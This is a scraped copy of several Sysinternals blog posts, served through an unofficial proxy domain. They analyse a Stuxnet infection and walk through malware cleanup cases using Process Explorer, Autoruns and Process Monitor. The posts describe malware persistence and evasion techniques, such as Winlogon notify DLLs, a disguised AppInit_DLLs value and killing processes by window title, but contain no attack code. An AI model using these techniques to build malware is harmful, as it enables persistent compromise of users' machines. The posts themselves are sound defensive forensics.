border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="304" /> </P> <P> The two additional Lsass processes obviously have some mischievous purpose, but the main executable and command lines don’t reveal any clues. But besides running as children of Services.exe, another suspicious characteristic of the two superfluous processes is the fact that they have very few DLLs loaded, as shown by the Process Explorer DLL view: </P> <P> <IMG alt="image" border="0" height="178" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8737.image_5F00_thumb_5F00_235886F5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121306iB3C35143C56C14FF" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The real Lsass has many more: </P> <P> <IMG alt="image" border="0" height="180" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0211.image_5F00_thumb_5F00_7EC6F970.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121307i9A2F20DA67858FCF" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> No non-Microsoft DLLs show up in the loaded-module lists for Services.exe, Lsass.exe or Explorer.exe, so they are probably hosting injected executable code. Studying the code would require advanced reverse engineering skills, but we might be able to determine where the code resides in those processes, and hence what someone with those skills would analyze, by using the <A href="#" target="_blank"> Sysinternals VMMap </A> utility. VMMap is a process memory analyzer that visually displays the address space usage of a process. To execute, code must be stored in memory regions that have Execute permission, and because injected code will likely be stored in memory that’s normally for data and therefore not usually executable, it might be possible to find the code just by looking for memory not backed by a DLL or executable that has Execute permission. If the region has Write permission, that makes it even more suspicious, because the injection would require Write permission and probably isn’t concerned with removing the permission once the code is in place. Sure enough, the legitimate Lsass has no executable data regions, but both new Lsass processes have regions with Execute and Write permissions in their address spaces at the same location and same size: </P> <P> <IMG alt="image" border="0" height="120" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1030.image_5F00_thumb_5F00_2C6674A5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121308i7415EE88EEDB27AF" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> VMMap’s Strings dialog, which you open from the View menu, shows any printable strings in a selected region. The 488K region has the string “This program cannot be run in DOS mode" at its start, which is a standard message stored in the header of every Windows executable. That implies that the virus is not just injecting a code snippet, but an entire DLL: </P> <P> <IMG alt="image" border="0" height="267" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1157.image_5F00_thumb_5F00_0D98BF2B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121309iEAB8E354360A6EC4" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="329" /> </P> <P> The region is almost devoid of any other recognizable text, so it’s probably compressed, but the Windows API strings at the end of the region are from the DLL’s import table: </P> <P> <IMG alt="image" border="0" height="269" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2211.image_5F00_thumb_5F00_3B19DEEE.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121310i074F1C5BE94FD58D" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="329" /> </P> <P> Explorer.exe, the initially infected process, and Services.exe, the process that launched the Lsass processes, also have no suspicious DLLs loaded, but also have unusual executable data regions: </P> <P> <IMG alt="image" border="0" height="109" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3073.image_5F00_thumb_5F00_2F5A0F6C.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121311iC25C3B2BAFD55FE0" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> The two Mrx drivers are also visible in the loaded driver list, which you can see in the DLL view of Process Explorer for the System process. The only reason they stand out at all is that their version information reports them to be from Microsoft, but their signatures are from Realtek (the certificates have been revoked, but since the test system is disconnected from the Internet, it is unable to query the Certificate Revocation List servers): </P> <P> <IMG alt="image" border="0" height="139" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8750.image_5F00_thumb_5F00_56B44A51.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121312i88D876C18EC50E1A" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> <STRONG> <FONT size="4"> Looking Deeper </FONT> </STRONG> </P> <P> At this point we’ve gotten about as far as we can with Autoruns and Process Explorer. What we know so far is that Stuxnet drops two driver files on the system, registers them to start when the system boots, and starts them. It also infects Services.exe and creates two Lsass.exe processes that run until system shutdown, the purpose of which can’t be determined by their command-lines or loaded DLLs. However, VMMap has given us pointers to injected code and Autoruns has given us an easy way to clean the infection. The Process Monitor trace from the infection has about 30,000 events, and from that we’ll be able to gain further insight into what happens at the time of the infection, where the injected code is stored on disk, and how Stuxnet activates the code at boot time. Read more in <A href="#" target="_blank"> Part 2 </A> . </P> <P> <EM> Mark Russinovich is a Technical Fellow on the Windows Azure team at Microsoft and is author of <A href="#" target="_blank"> Windows Internals </A> , <A href="#" target="_blank"> The Windows Sysinternals Administrator’s Reference </A> , and the cyberthriller <A href="#" target="_blank"> Zero Day: A Novel </A> . You can contact him at </EM> <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> <EM> markruss@ntdev.microsoft.com </EM> </A> <EM> . </EM> </P> </BODY></HTML> Thu, 27 Jun 2019 07:13:46 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-1/ba-p/724029 MarkRussinovich 2019-06-27T07:13:46Z Zero Day is Here! https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/zero-day-is-here/ba-p/724009 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 13, 2011 </STRONG> <BR /> <P> <IMG align="left" alt="image" border="0" height="240" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4784.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121300iB86DA387696E0679" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="185" /> I’m excited to announce that my first novel, a cyber thriller entitled <I> Zero Day </I> , is now available at all major book retailers! </P> <P> Zero Day is a book in the style of Crichton and Clancy, weaving technical fact into the story. If you like the <A href="#" target="_blank"> Sysinternals tools </A> , the articles I post on this blog, are interested in computer security, or just enjoy a heart-stopping thriller, you’ll like Zero Day.&nbsp; You can read a synopsis and a sample chapter, as well as find pointers to on-line book sellers, at the <A href="#" target="_blank"> Zero Day </A> web site. </P> <P> I’m really pleased by the initial reviews, which have been very positive. Here is just a sampling: </P> <P> <EM> "Zero Day is an addictive read that will stay with you for a long time to come. It is a MUST READ!" <BR /> </EM> <A href="#" target="_blank"> <EM> http://yougottareadreviews.blogspot.com/2011/01/review-zero-day-by-mark-russinovich.html </EM> </A> </P> <P> <EM> "If you aren't a computer geek, some of the lingo and explanations are going to pass right by you; but there's enough information and ever-developing, terrifying plot developments to keep you riveted to every page." <BR /> </EM> <A href="#" target="_blank"> <EM> http://crystalbookreviews.blogspot.com/2011/01/zero-day-novel-by-mark-russinovich.html </EM> </A> </P> <P> <EM> "The entertaining story line is linear yet exhilarating and frightening especially since author Mark Russinovich is an expert on the topic as his résumé brings a scary possibility to the cyber attack that the thriller focuses on." <BR /> </EM> <A href="#" target="_blank"> <EM> http://genregoroundreviews.blogspot.com/2011/01/zero-day-mark-russinovich.html </EM> </A> </P> <P> <EM> "The novel is more plot than characters, but it is a very frightening, fast moving narrative that reveals how interconnected we all are through the internet." <BR /> </EM> <A href="#" target="_blank"> <EM> http://bookgarden.blogspot.com/2011/01/zero-day-by-mark-russinovich.html </EM> </A> </P> <P> You can read all the reviews I’ve collected so far on the <A href="#" target="_blank"> Praise for Zero Day </A> page at the Zero Day Web site. </P> <P> If you’re curious about the novel publishing process, you can read my three-part blog post describing my experience with Zero Day, from the initial idea, to finding an agent, signing a publisher, and final publication: <A href="#" target="_blank"> The Road to Zero Day </A> </P> <P> Buy the book, leave a review on <A href="#" target="_blank"> Amazon.com </A> , follow me on <A href="#" target="_blank"> Twitter </A> , meet me at a <A href="#" target="_blank"> book signing </A> , and send a note sharing your thoughts to <A href="https://gorovian.000webhostapp.com/?exam=mailto:markrussinovich@hotmail.com" target="_blank"> markrussinovich@hotmail.com </A> . </P> <P> I hope you enjoy the book look forward to hearing from you! </P> </BODY></HTML> Thu, 27 Jun 2019 07:12:15 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/zero-day-is-here/ba-p/724009 MarkRussinovich 2019-06-27T07:12:15Z The Case of the Unusable System https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unusable-system/ba-p/724007 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 13, 2011 </STRONG> <BR /> <P> This post continues in the malware hunting theme of the <A href="#" target="_blank"> last couple of posts </A> as <A href="#" target="_blank"> Zero Day </A> availability draws near (it’s available tomorrow!). It began when a friend of mine at Microsoft told me that a neighbor of hers had a laptop that malware had rendered unusable and asked if as a favor I’d be willing to take a look. Her friend was desperate because she had important files, including documents and pictures, on the laptop and had no backup. </P> <P> Unlike most people in the computer industry that view the requests of friends and family for troubleshooting help as a burden to be avoided, I embrace the challenge. When fixing a system or application problem, it’s me against the computer and success is satisfying and always a learning experience. But that success also has an academic feel. With malware, it becomes personal, pitting me against the minds of criminal hackers. Defeating malware is a victory of good over evil. I should print a t-shirt that says “Yes, I will fix your computer!”. I immediately agreed and we made arrangements to get the laptop dropped off at my office. </P> <P> When I had a few free minutes the next day I powered on the laptop, logged in, and within seconds was greeted with a torrent of warning dialogs announcing that the computer was infested with malware and that it was under attack from the Internet: </P> <P> <IMG alt="image" border="0" height="360" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5165.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121296i7641C68519D6CC75" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="550" /> </P> <P> I also saw a barrage of warnings that various applications had been stopped from launching because they were infected: </P> <P> <IMG alt="image" border="0" height="131" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4101.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121297iD9016A927EC2AEC3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="385" /> </P> <P> I hadn’t seen scareware this aggressive. After a minute the appearance of new warnings ceased and I began my investigation. Starting with the insertion of a USB key containing the Sysinternals tools, I tried launching <A href="#" target="_blank"> Process Explorer </A> . However, I found that trying to run anything - whether part of Windows or third-party - resulted not in the execution of the application, but in the display of the same “Security Warning” dialog reporting that the application was infected. This system was truly unusable. </P> <P> The infected account was the only one configured, so that ruled out trying to clean from a different account in the hope that it might not be infected. I was afraid that cleaning the malware might require off-line access to the system via a boot CD installed with the <A href="#" target="_blank"> Microsoft Diagnostic and Repair Toolset </A> (the Microsoft product that’s the descendent of <A href="#" target="_blank"> ERD Commander </A> , the product I created at <A href="#" target="_blank"> Winternals Software </A> ). My MSDaRT CD was at home and I’d have to burn a new one. But I had noticed when I logged on that it was 5-10 seconds before the first popups started appearing. If the malware didn’t block running applications during that time window, either because it was initializing or just letting the first few logon applications run so that the Explorer could fully start, I might be able to sneak Process Explorer and <A href="#" target="_blank"> Autoruns </A> in before the lock down. That would save me the time and trouble of burning a CD. It was worth a try. </P> <P> Before logging off, I copied Process Explorer and Autoruns to the desktop for easy access. I logged on and double-clicked the icons in quick succession. There was a short pause and then both applications appeared. It had worked! I had to wait for the avalanche of warning dialogs to stop and then turned my attention to Process Explorer. Sure enough, one process stood out, hgobsysguard.exe: </P> <P> <IMG alt="image" border="0" height="75" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4505.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121298i2530A319E0EB4D68" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I explain the common characteristics of malware in my <A href="#" target="_blank"> Advanced Malware Cleaning </A> presentation and this sample had all the telltale signs: </P> <UL> <LI> <STRONG> Random or unusual name: </STRONG> hgobsysguard.exe seems like it might be legitimate, but I had never seen or heard of it and the name revealed nothing of its purpose or origin </LI> <LI> <STRONG> No company name or description: </STRONG> legitimate software almost always includes a company name and description in the version resource of their executables. Malware often omits this since most users never run tools that show this information. </LI> <LI> <STRONG> Installed somewhere other than the \Program Files directory: </STRONG> you should add software not installed in the \Program Files directory to the list of suspects for closer inspection. In this case the executable was installed in the user’s profile, another sign of malware. </LI> <LI> <STRONG> Encrypted or compressed: </STRONG> In order to avoid detection by antivirus and make analysis more difficult, malware authors often encrypt their executables. Process Explorer uses heuristics to try to identity encrypted executables, which it refers to as “packed”, and it highlights them in purple like it did for this one. </LI> </UL> <P> I carefully studied the other running executables, including the services running within the various Svchost.exe hosting processes, but I didn’t see anything else that looked suspicious. Sometimes malware employs the “buddy system”, where it uses two processes, each watching the other so that if either terminates, the other restarts it, making it virtually impossible to terminate them. When I see that I use Process Explorer’s suspend feature to put both to sleep and then kill them (which is also arguably more humane). Here all I had was one malicious process, so I just terminated it. It didn’t reappear, which was a good sign that there wasn’t a buddy lurking within another process as a DLL. I then navigated to the malware’s install directory and deleted its files. </P> <P> With the process and executables out of the way, the next step was to determine how the malware activated and delete its autostart entries. I switched to Autoruns, which had finished its scan in the meantime, and spotted two entries pointing at the malware’s executable. Both entries had names that appeared to have been randomly generated, consistent with typical malware: </P> <P> <IMG alt="image" border="0" height="203" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6747.image_5F00_thumb_5F00_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121299i51901ADC9D6E3089" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I deleted the entries, studied the rest in case there was some other component that wasn’t so obvious, and did some standard crapware cleanup while I was there. I rebooted the system and logged back on to confirm it was clean. This time there were no popups, I was able to run software as normal, and neither Process Explorer nor Autoruns showed any sign of more infection. I had spent a total of five minutes and had some fun outwitting the malware to avoid offline cleaning. Case closed. </P> </BODY></HTML> Thu, 27 Jun 2019 07:12:03 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unusable-system/ba-p/724007 MarkRussinovich 2019-06-27T07:12:03Z The Case of the Sysinternals-Blocking Malware https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-sysinternals-blocking-malware/ba-p/723997 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 06, 2011 </STRONG> <BR /> <P> Continuing the theme of focusing on malware-related cases (last week I posted <A href="#" target="_blank"> The Case of the Malicious Autostart </A> ) as a lead up to the publication on March 15 of my novel <A href="#" target="_blank"> Zero Day </A> , this post describes one submitted to me by a user that took a unique approach to cleaning an infection when faced with the apparent inability to run <A href="#" target="_blank"> Sysinternals </A> utilities. </P> <P> More and more often, malware authors target antivirus products and Sysinternals utilities in an effort to maintain their grip on a conquered system. This case began when the user’s friend asked if he’d take a look at his computer, which had begun taking an unusually long times to boot and logon. The friend, already suspecting that malware might be the cause, had tried to run a <A href="#" target="_blank"> Microsoft Security Essentials </A> (MSE) scan, but the scan would never complete. They also hadn’t spotted anything in Task Manager. </P> <P> The user, familiar with Sysinternals, tried following the malware cleaning recipe I presented in my <A href="#" target="_blank"> Advanced Malware Cleaning presentation </A> . Double-clicking on <A href="#" target="_blank"> Process Explorer </A> resulted in a brief flash of the Process Explorer UI followed by the termination of the Process Explorer process, however. He turned to <A href="#" target="_blank"> Autoruns </A> next, but the result was the same. Process Monitor had the same behavior and at this point he became convinced the malware was responsible. </P> <P> Malware can use numerous techniques to identify software that it wants to disable. For example, it can use the hash of the software’s executables, look for specific text in the executable images, or scan process memory for keywords. The fact that any small unique attribute is all that’s needed is the reason I haven’t bothered implementing mechanisms aimed at preventing identification. It’s a game I can’t win so I leave it to the ingenuity of the user to figure out a workaround. If the malware is simply keying off the names of executables, for instance, the user could simply rename the tools. </P> <P> What makes this case somewhat ironic is that malware authors have long used various Sysinternals tools themselves. For example, the <A href="#" target="_blank"> Clampi trojan </A> , which spread in early 2009, used the <A href="#" target="_blank"> Sysinternals PsExec </A> utility to automatically spread. <A href="#" target="_blank"> Coreflood </A> , a virus that stole passwords in mid-2008, also used PsExec. More recently, <A href="#" target="_blank"> Chinese hackers used Sysinternals tools </A> to attack oil refineries. Malware authors even hijacked the Sysinternals brand by releasing a “scareware” product – malware that presents fake security dialogs to lure you into buying fake antimalware – named <A href="#" target="_blank"> Sysinternals Antivirus </A> : </P> <P> <IMG alt="image" border="0" height="421" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8611.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121291i77C79FD39276A2C5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Back to the case, the user, wondering if the malware was looking for particular processes or simply scanning for windows with certain keywords in their title bars, opened notepad, typed some text, and saved it to a file named “process explorer.txt”. Sure enough, when he double-clicked on the new text file, Notepad made a brief appearance before exiting. </P> <P> Locked out of his usual troubleshooting tools, he wondered if there might be some other Sysinternals utility that he could leverage, browsed to the <A href="#" target="_blank"> Sysinternals utilities index </A> and scanned the list. Just a few tools down, the <A href="#" target="_blank"> Desktops </A> utility caught his attention. Desktops lets you create up to three additional virtual desktops for running your applications and use hotkeys or the Desktops taskbar dialog to quickly switch between them. Maybe the malware would ignore windows on alternate desktops? He launched Desktops using its Sysinternals Live link (which lets you execute the utilities off the Web without even having to download them) and created a second desktop. Holding his breath, he double-clicked on the Process Explorer icon – and it launched! </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1030.image_5F00_thumb_5F00_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121292i9CED7A0905E847F0" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> This particular malware presumably has a timer-based routine that queries window title text and terminates processes that have titles with blocked keywords like “process explorer”, “autoruns”, “process monitor” and likely the names of other advanced malware-hunting tools and common antivirus products. Because a window enumeration only returns the windows on a process’s current desktop, the malware was not able to see the Sysinternals tools running on the second desktop. </P> <P> He didn’t spot anything unusual in the Process Explorer process list, so he launched Process Monitor (I would have tried Autoruns next). He let Process Monitor capture a couple of minutes of activity and then began examining the trace. His eye was immediately drawn to thousands of Winlogon registry operations, something he normally didn’t observe when he ran Process Monitor. Guessing that it was related to the malware, he set a filter to just include Winlogon and took a closer look: </P> <P> <IMG alt="image" border="0" height="112" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4666.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121293i99752F78FB2CCA2C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Most of the operations were registry queries of values under a key with a bizarre name, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Notify\acdcacaeaacbafbeaa. In order to start every time Windows boots, the malware appeared to have registered itself as a <A href="#" target="_blank"> Winlogon notification DLL </A> . Winlogon notification DLLs are commonly used by software that monitors logon, logoff and password change events, but are also often hijacked by malware. To confirm his suspicion and find the name of the DLL, he right-clicked on one of the entries and selected “Jump To” from the Process Monitor context menu. In response, Process Monitor executed Regedit and navigated to the referenced key: </P> <P> <IMG alt="image" border="0" height="80" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5557.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121294i04E32AF681113379" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The DLLName value pointed at the malicious DLL, which had the same name - probably randomly generated – as the registry key. He knew at this point that the malware was probably interfering with the MSE scan, but armed with the name of the DLL, he wondered if MSE might be able to clean that specific file. Before he tried that he tried a full scan, weakly hoping that the malware wouldn’t detect the execution on the second desktop, but was unsuccessful. He launched MSE again and navigated the file-scan dialog to the DLL. A couple of seconds later MSE completed the analysis and reported that it both knew the malware and was able to automatically clean it: </P> <P> <IMG alt="image" border="0" height="281" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4571.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121295i3DEACA21937D2815" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> He pressed the recommended action button and MSE quickly dispatched the malware. As a final check, he rebooted the system. Sure enough, the system booted quickly and the logon was fast. He was able to run the Sysinternals tools on the main desktop and Process Monitor’s trace was devoid of the malicious activity. With the help of a Sysinternals tools, he had vanquished the Sysinternals-blocking malware and successfully closed the case. </P> </BODY></HTML> Thu, 27 Jun 2019 07:11:29 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-sysinternals-blocking-malware/ba-p/723997 MarkRussinovich 2019-06-27T07:11:29Z The Case of the Malicious Autostart https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-malicious-autostart/ba-p/723990 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Feb 26, 2011 </STRONG> <BR /> <P> Given that my novel, <A href="#" target="_blank"> Zero Day </A> , will be published in a few weeks and is based on malware’s use as a weapon by terrorists, I thought it appropriate to post a case that deals with malware cleanup with the Sysinternals tools. This one starts when Microsoft support got a call from a customer representing a large US hospital network reporting that they had been hit with an infestation of the <A href="#" target="_blank"> Marioforever </A> virus. They discovered the virus when their printers started getting barraged with giant print jobs of garbage text, causing their network to slow and the printers to run out of paper. Their antivirus software identified a file named Marioforever.exe in the %SystemRoot% folder of one of the machines spewing files to the printers as suspicious, but deleting the file just resulted in it reappearing at the subsequent reboot. Other antivirus programs failed to flag the file at all. </P> <P> The Microsoft support engineer assigned the case, started looking for clues by seeing if there were additional suspicious files in the %SystemRoot% directory of one of the infected systems. One file, a DLL named Nvrsma.dll, had a recent timestamp and although it was named similarly to Nvidia display driver components, the computer in question didn’t have an Nvidia display adapter. When he tried to delete or rename the file, he got a sharing violation error, which meant that some process had the file open and was preventing others from opening it. There are several Sysinternals tools that will list the processes that have a file open or a DLL loaded, including <A href="#" target="_blank"> Process Explorer </A> and <A href="#" target="_blank"> Handle </A> . Because the file was a DLL, though, the engineer decided on the <A href="#" target="_blank"> Sysinternals Listdlls </A> utility, which showed that the DLL was loaded by one process, Winlogon: </P> <P> <IMG alt="image" border="0" height="169" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2110.image_5F00_thumb_5F00_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121281i3791CB047C5F9A4C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Winlogon is the core system process responsible for managing interactive logon sessions, and in this case was also the host for a malicious DLL. The next step was to determine how the DLL was configured to load into Winlogon. That had to be via an autostart location, so he ran the <A href="#" target="_blank"> Autoruns </A> utility, but there was no sign of Nvrsma.dll and all the autostart entries were either Windows components or legitimate third-party components. That appeared to be a dead end. </P> <P> If he could watch Winlogon’s startup with a file system and registry monitoring utility like <A href="#" target="_blank"> Process Monitor </A> , he might be able to determine the magic that got Winlogon to load Nvrsma.dll. Winlogon starts during the boot process, however, so he had to use Process Monitor’s boot logging feature. When you configure Process Monitor to log boot activity, it installs its driver so that the driver loads early in the boot process and begins monitoring, recording activity to a file named %SystemRoot%\Procmon.pmb. The driver stops logging data to the file either when someone launches the Process Monitor executable or until the system shuts down. </P> <P> After configuring Process Monitor to capture boot activity and rebooting the system, the engineer ran Process Monitor and loaded the boot log. He searched for “nvrsma” and found this query by Winlogon of the registry value HKLM\Software\Microsoft\Windows NT\CurrentVersion\bwpInit_DLLs that returned the string “nvrsma”: </P> <P> <IMG alt="image" border="0" height="57" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7220.image_5F00_thumb_5F00_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121282i82E14B78A0D63829" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The engineer had never seen a value named bwpInit_DLLs, but the name was strikingly similar to an autostart entry point he did know of, AppInit_DLLs. The AppInit_DLLs value is one that User32.dll, the main window manager DLL, reads when it loads into a process. User32.dll loads any DLLs referenced in the value, so any Windows application that has a user-interface (as opposed to being command-line oriented) loads the DLLs listed in the value. Sure enough, a few operations later in the trace he saw Winlogon load Nvrsma.dll: </P> <P> <IMG alt="image" border="0" height="74" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3034.image_5F00_thumb_5F00_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121283i5EC751E0A6515F91" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> Its power to cause a DLL to get loaded into virtually every process has made AppInit_DLLs a favorite of malware authors. In fact, it’s become such a nuisance that in Windows 7 the default policy <A href="#" target="_blank"> requires that DLLs listed in the value be code-signed to be loaded </A> . </P> <P> The boot trace had no reference to AppInit_DLLs, making it obvious that the malware had somehow coerced User32.dll into querying the alternate location. It also explained why the entry hadn’t shown up in the Autoruns scan. One question he had was why no other process had Nvrsma.dll loaded into it, but further into the trace he saw that an attempt to load the DLL by another process resulted in the same sharing violation error he’d encountered: </P> <P> <IMG alt="image" border="0" height="57" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6747.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121284i71936B71D7F0DCFE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Simply loading a DLL won’t cause a handle to remain open and cause this kind of error, so he searched backward, looking for other CreateFile operations on the DLL that had no corresponding CloseFile operation. The last such operation before the sharing violation was performed by Winlogon: </P> <P> <IMG alt="image" border="0" height="75" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4505.image_5F00_thumb_5F00_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121285iAA1D94928FA7E54E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The stack of the operation, which he viewed by double-clicking on the operation to open the properties dialog and then clicking on the Stack tab, showed that it was Nvrsma.dll itself that opened the file, presumably to protect itself from being deleted and to prevent itself from loading into other processes: </P> <P> <IMG alt="image" border="0" height="296" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3034.image_5F00_thumb_5F00_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121286i23D68557716C8E45" 